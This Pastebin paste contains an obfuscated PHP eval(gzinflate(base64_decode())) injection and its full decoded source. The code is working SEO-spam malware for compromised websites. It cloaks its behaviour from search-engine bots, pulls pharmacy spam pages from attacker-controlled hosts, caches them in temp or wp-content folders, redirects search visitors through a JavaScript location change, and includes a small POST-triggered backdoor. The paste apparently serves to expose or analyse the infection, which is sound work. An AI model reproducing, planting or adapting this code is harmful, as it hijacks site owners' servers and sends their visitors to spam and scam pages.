Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php eval(gzinflate(base64_decode('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')));?>
- -----------------------------
- Decodes to:
- -------------------------------
- <?php if (!defined('frmDs')) {
- define('frmDs', 1);
- error_reporting(0);
- function frm_dl($url) {
- if (function_exists('curl_init')) {
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $out = curl_exec($ch);
- if (curl_errno($ch) !== 0) $out = false;
- curl_close($ch);
- } else {
- $out = @file_get_contents($url);
- }
- return trim($out);
- }
- function frm_crpt($in) {
- $il = strlen($in);
- $o = '';
- for ($i = 0;$i < $il;$i++) $o.= $in[$i] ^ '*';
- return $o;
- }
- function frm_getcache($tmpdir, $link, $cmtime, $toe = false) {
- $f = $tmpdir . '/sess_' . md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
- $fe = file_exists($f);
- if (!$fe || time() - filemtime($f) > 60 * $cmtime) {
- $dlc = frm_dl($link);
- if ($fe && $dlc === false) @touch($f);
- else {
- if ($fe && empty($dlc) && $toe) {
- @touch($f);
- } else {
- if ($fp = @fopen($f, 'w')) {
- fwrite($fp, frm_crpt($dlc));
- fclose($fp);
- } else {
- return $dlc;
- }
- }
- }
- }
- $fc = @file_get_contents($f);
- return ($fc) ? frm_crpt($fc) : '';
- }
- function frm_isbot() {
- $ua = @strtolower($_SERVER['HTTP_USER_AGENT']);
- if (($lip = ip2long($_SERVER['REMOTE_ADDR'])) < 0) $lip+= 4294967296;
- $rs = array(array(3639549953, 3639558142), array(1089052673, 1089060862), array(1123635201, 1123639294), array(1208926209, 1208942590), array(3512041473, 3512074238), array(1113980929, 1113985022), array(1249705985, 1249771518), array(1074921473, 1074925566), array(3481178113, 3481182206), array(2915172353, 2915237886), array(2850291712, 2850357247));
- foreach ($rs as $r) if ($lip >= $r[0] && $lip <= $r[1]) return true;
- if (!$ua) return true;
- $bots = array('googlebot', 'bingbot', 'slurp', 'msnbot', 'jeeves', 'teoma', 'crawler', 'spider');
- foreach ($bots as $b) if (strpos($ua, $b) !== false) return true;
- $h = @gethostbyaddr($_SERVER['REMOTE_ADDR']);
- $hba = array('google', 'msn', 'yahoo');
- if ($h) foreach ($hba as $hb) if (strpos($h, $hb) !== false) return true;
- return false;
- }
- function frm_tmpdir() {
- $fs = array('/tmp', '/var/tmp', './wp-content/cache', './wp-content/uploads', './tmp', './cache', './images');
- foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
- if ($t = getenv($v)) {
- $fs[] = $t;
- }
- }
- if (function_exists('sys_get_temp_dir')) {
- $fs[] = sys_get_temp_dir();
- }
- $fs[] = '.';
- foreach ($fs as $f) {
- $tf = $f . '/' . md5(rand());
- if ($fp = @fopen($tf, 'w')) {
- fclose($fp);
- unlink($tf);
- return $f;
- }
- }
- return false;
- }
- function frm_seref() {
- $r = @strtolower($_SERVER["HTTP_REFERER"]);
- $ses = array('google', 'bing', 'yahoo', 'ask', 'aol');
- foreach ($ses as $se) if (strpos($r, $se . '.') != false) return true;
- return false;
- }
- function frm_havekey($s = false) {
- $nks = explode('|', 'abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
- $k = ($s == false) ? @strtolower($_SERVER["HTTP_REFERER"] . $_SERVER["REQUEST_URI"]) : $s;
- if (strpos($k, "site%3A") !== false || strpos($k, "inurl%3A") !== false) return '';
- foreach ($nks as $n) if (preg_match("/(|_)$n(|_)/", $k)) return $n;
- return '';
- }
- function frm_strtonum($Str, $Check, $Magic) {
- $Int32Unit = 4294967296;
- $length = strlen($Str);
- for ($i = 0;$i < $length;$i++) {
- $Check*= $Magic;
- if ($Check >= $Int32Unit) {
- $Check = ($Check - $Int32Unit * (int)($Check / $Int32Unit));
- $Check = ($Check < - 2147483648) ? ($Check + $Int32Unit) : $Check;
- }
- $Check+= ord($Str{$i});
- }
- return $Check;
- }
- function frm_chhash($String) {
- $Check1 = frm_strtonum($String, 0x1505, 0x21);
- $Check2 = frm_strtonum($String, 0, 0x1003F);
- $Check1 >>= 2;
- $Check1 = (($Check1 >> 4) & 0x3FFFFC0) | ($Check1 & 0x3F);
- $Check1 = (($Check1 >> 4) & 0x3FFC00) | ($Check1 & 0x3FF);
- $Check1 = (($Check1 >> 4) & 0x3C000) | ($Check1 & 0x3FFF);
- $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) << 2) | ($Check2 & 0xF0F);
- $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000);
- $Hashnum = ($T1 | $T2);
- $CheckByte = 0;
- $Flag = 0;
- $HashStr = sprintf('%u', $Hashnum);
- $length = strlen($HashStr);
- for ($i = $length - 1;$i >= 0;$i--) {
- $Re = $HashStr{$i};
- if (1 === ($Flag % 2)) {
- $Re+= $Re;
- $Re = (int)($Re / 10) + ($Re % 10);
- }
- $CheckByte+= $Re;
- $Flag++;
- }
- $CheckByte%= 10;
- if (0 !== $CheckByte) {
- $CheckByte = 10 - $CheckByte;
- if (1 === ($Flag % 2)) {
- if (1 === ($CheckByte % 2)) {
- $CheckByte+= 9;
- }
- $CheckByte >>= 1;
- }
- }
- return '7' . $CheckByte . $HashStr;
- }
- function frm_chpr($url, $td) {
- $ch = frm_chhash($url);
- $res = frm_getcache($td, "http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url", 60 * 24 * 7);
- if (($pos = strpos($res, "Rank_")) !== false) return substr($res, 9, 1);
- }
- function frm_red($k) {
- if (!frm_isbot() && frm_seref()) {
- $r = @urlencode($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
- $s = @urlencode($_SERVER['HTTP_REFERER']);
- die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
- }
- }
- $tdir = frm_tmpdir();
- $isb = frm_isbot();
- $k = frm_havekey();
- $host = preg_replace('/^w{3}\./', '', strtolower($_SERVER['HTTP_HOST']));
- if ($cv = @$_POST[md5($host . 'ch') ]) {
- exit($cv);
- }
- if ($tdir && strlen($host) < 100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)) {
- $parg = substr(preg_replace('/[^a-z]+/', '', strtolower(base64_encode(md5($host . 'p1')))), 0, 3);
- $sp = "http://eylrgwfxkhb.rr.nu/stat/feed.php?pa=$parg&h=$host";
- //
- $tp = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
- if ($isb && ($ppr = frm_chpr($tp)) > 1) {
- $pc = frm_getcache($tdir, $sp . "&a=l&p=" . urlencode($tp) . "&pr=$ppr", 60 * 24);
- if ($pc) die($pc);
- }
- //
- $ruri = strtolower($_SERVER['REQUEST_URI']);
- $pageid = (isset($_GET[$parg])) ? $_GET[$parg] * 1 : 0;
- if ((strpos($ruri, '/?') === 0 || strpos($ruri, '/index.php?') === 0) && $pageid > 0) {
- frm_red($k);
- die(frm_getcache($tdir, $sp . "&p=$pageid", 60 * 24, true));
- }
- if (($ruri == '/' || $ruri == '/index.php') && $isb) {
- $c = frm_getcache($tdir, $sp, 60 * 24);
- if ($c) die($c);
- }
- //
- if ($k && $sdl = frm_getcache($tdir, $sp . "&a=s", ($isb ? 30 : 60 * 24 * 7), true)) {
- if (strpos($sdl, '|' . $ruri . '|') !== false) {
- frm_red($k);
- die(frm_getcache($tdir, $sp . "&a=s&p=" . urlencode($ruri), 60 * 24 * 7, true));
- }
- }
- }
- if ($k) frm_red($k);
- }
Add Comment
Please, Sign In to add comment